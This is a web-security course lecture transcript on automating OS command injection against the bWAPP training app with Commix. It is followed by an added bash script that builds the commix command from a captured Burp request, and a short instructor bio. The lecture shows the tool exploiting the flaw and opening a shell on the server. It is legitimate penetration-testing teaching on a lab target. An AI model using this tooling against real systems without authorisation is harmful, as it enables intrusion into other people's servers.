Command Injection & SSI
In this course, we continue working on bWAPP and we're going to use it to learn about some new attacks, namely command injection and SSI vulnerabilities.
Hi. Within this lecture, we're going to continue working on command injection, but this time we're going to try to automate this process so that we can be fast and efficient, okay? Because it may take a lot of time to test everything in order to understand whether we really have a command injection vulnerability here or not. So, we're going to use a tool for that. This tool is called Commix, and it comes pre-installed with Kali Linux. So, let me show you how it works. Open a terminal and write 'commix' like this, okay? So, c-o-m-m-i-x. As you can see, our tool is installed and it's giving us an error because we haven't specified any parameters. In order to do that, we need to understand how this works. As you can see, there are a lot of parameters over here, like u, l, m. So, I'm going to run '-h' over here to see the help documentation, and as you can see it's a very comprehensive tool as well, because we get a lot of options, a lot of parameters that we can work with.

So, here you go. This is an all-in-one OS command injection and exploitation tool. It tries to find OS command injections, okay? And if it can, it opens a shell for you, so it will automatically be hacking into the website if there is an OS command injection possibility, okay? Of course, in your own time you can just wander around this help documentation and see the other usages and other parameters as well. But I'm going to show you the basics of this tool. We need Burp Suite in this case. Actually, I'm going to show you why: we need some cookie information to be robust in this case, because sometimes in websites you have to provide a cookie with the request, otherwise it won't work, okay? For example, if we are not logged in and we try to do this lookup thing, the DNS lookup thing, they may have a filter: if you are not logged in or if you don't have a cookie, it may not work for you, okay?
You can get this cookie from the previous request that we made within the previous lecture, okay? We can see all the requests and responses back here for commandi.php. We can see the POST request, we can see the GET request and so on. Let me show you what we're going to do to get one of those. If you click one of them, you can see we just went to google.com and submitted the form, but there's also a cookie here, and this is the PHPSESSID, which is basically the ID of the cookie, and that's how it recognizes us. So, we need to get this PHPSESSID so that we can give it as an input, as a parameter, to Commix. Again, you can just get it from one of the POST requests that we made in the previous lecture, or you can just intercept the request and see it for yourself, so that you can copy the PHPSESSID and give it as a parameter to Commix. Actually, I don't know, maybe if we omit this thing, if we don't do it at all, maybe it can work. If we don't give PHPSESSID as a parameter, it can work in this case, since it's a buggy application, but in real-life examples you're definitely going to need this. So, I'm just going to show you the way it's supposed to be, not only the basics but also the details as well, like we do in most cases.

Maybe you have actually closed down Burp Suite for some reason when you skipped the lectures, or maybe you haven't even watched the previous lecture. I don't know, you just came to this website. So, we're working with this bWAPP application and we have seen how to do command injection in the previous lecture. So, try to find this commandi.php, and your PHPSESSID will be different than mine. So, don't just pause the video and copy and paste the thing and give it as a parameter, because it won't work. It changes every time as well. So, make sure you find your own PHPSESSID, okay? Now let's copy this. Let's just take this PHPSESSID value from here. Obviously, we want only this part, okay?
Not this part, not the PHPSESSID part, just copy the thing that starts with F here. Maybe it starts with something else for you, okay? Then we're going to need it in Commix. So, let me go back and show you how it's used. We write 'commix', and first of all we need to specify the URL itself. So, '--url'. And it's going to be equal to this, okay? Make sure you include the quotation marks over here as well, like this. So, paste it and close the quotation mark. Here you go. This is the URL that we're going to test the command injection on, okay?

The next thing is to give the cookie information, okay? This is the PHPSESSID that we have been looking for. So, let me open the quotation mark and get the PHPSESSID one more time. Let me just take all of these things, with the PHPSESSID as well. I believe we have to take the security level as well; it's a part of the cookie, right? So, let me take everything over here and try it like that. Let me paste this selection, and here you go. This is my cookie information. Then we're going to specify the data, okay? And I will show you what the data is. All you have to say is '--data', not '-data'. This data is the parameters that we're sending over here, so this one. Make sure you get this one, and again, if you cannot see this request from before, you can always intercept it and take the same parameters that I have been taking, okay? If Commix doesn't have these parameters, then it won't work, because it won't actually send the correct requests to the server. So, I believe we went outside of the quotation marks. I'm going to put one over here and delete one from there, and here we go. We have the URL, we have the cookie, we have the data. It has every piece of information that it needs to send to the server in order to test for command injections.
After you do all of this, you can hit 'Enter' and it will start testing for this stuff. As you can see, it's already found it for me. I don't know if it's going to be the same for you speed-wise; maybe it can take some time. If it asks you something, like yes or no, just go with the default option, okay? For example, in this case the default option, as you can see, is 'Y', it's written in capital letters, okay? Even though it doesn't accept it, just say 'Y' and hit 'Enter'. If it says 'No', just say no and hit 'Enter'. And I believe we are already in the shell. As you can see, it found the vulnerability, exploited it, and showed us the terminal directly. If you type a question mark like this, you can see all the options available to you right now, okay? For example, if I run ls, I can see all the details. So, this is basically a shell. It's a Commix shell, but you can run all the commands that you may want to run on a Linux server, okay? That's how it works. Great.

So, this is a way to automate the process, but don't trust automated systems every time. You have to try your own way, manually, to understand first. If you cannot find anything, then you can move on to automated systems, but don't rely only on automated systems in web pentesting in general. We're going to stop here and continue in the next one.
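The invocation the lecture assembles by hand (URL, then the Cookie header, then the POST body as `--data`), as an added example that is not part of the lecture or of Commix itself: a small bash script that reads a raw request saved from Burp Suite, pulls out the path, Host, Cookie and body, and prints the matching commix command line. The request, the host address and the PHPSESSID value are constructed sample data (a real session ID is different for every login and expires, as the lecture warns). `--batch` is appended so commix takes its own default answer at each prompt, which is the choice the lecture makes by hand.

```bash
#!/usr/bin/env bash
# Added example (not from the lecture): build a commix command line from a raw
# HTTP request saved out of Burp Suite. Host, path, session ID and POST body
# below are constructed sample data; replace them with your own capture.
set -eu

# Constructed sample of the request Burp shows for bWAPP's commandi.php.
# The PHPSESSID value is invented; yours will be different and will expire.
SAMPLE_REQUEST='POST /bWAPP/commandi.php HTTP/1.1
Host: 192.168.56.101
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6; security_level=0
Content-Length: 33

target=www.google.com&form=submit'

# Print the value of one header from a raw request on stdin.
# Headers end at the first empty line; header names are case-insensitive.
header_value() {
    awk -v name="$1" '
        /^\r?$/ { exit }
        tolower($0) ~ "^" tolower(name) ":" {
            sub(/^[^:]*:[ \t]*/, ""); sub(/\r$/, ""); print; exit
        }'
}

# Print the request body (everything after the empty line): the --data value.
request_body() {
    awk 'body { sub(/\r$/, ""); print } /^\r?$/ { body = 1 }'
}

# Assemble the commix invocation. Arguments are single-quoted because the
# Cookie header contains ';' and spaces that the shell would otherwise split.
# --batch makes commix take its own default at every prompt, which is what the
# lecture does by hand when it answers 'Y' or 'N'.
build_commix_cmd() {
    local req path host cookie data
    req="$(cat)"
    path="$(printf '%s\n' "$req" | head -n 1 | awk '{ print $2 }')"
    host="$(printf '%s\n' "$req" | header_value Host)"
    cookie="$(printf '%s\n' "$req" | header_value Cookie)"
    data="$(printf '%s\n' "$req" | request_body)"
    printf "commix --url='http://%s%s' --cookie='%s' --data='%s' --batch\n" \
        "$host" "$path" "$cookie" "$data"
}

# Usage with the constructed sample; in practice: build_commix_cmd < request.txt
printf '%s\n' "$SAMPLE_REQUEST" | build_commix_cmd
```

Save the request from Burp's proxy history to a file and feed it to `build_commix_cmd` on stdin; the printed line is what the lecture types out manually, with your own cookie in place of the sample one. The script assumes a plain-HTTP target; for an HTTPS lab, change the scheme in the `--url` format string.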
Atil is an instructor at Bogazici University, where he graduated back in 2010. He is also co-founder of Academy Club, which provides training, and Pera Games, which operates in the mobile gaming industry.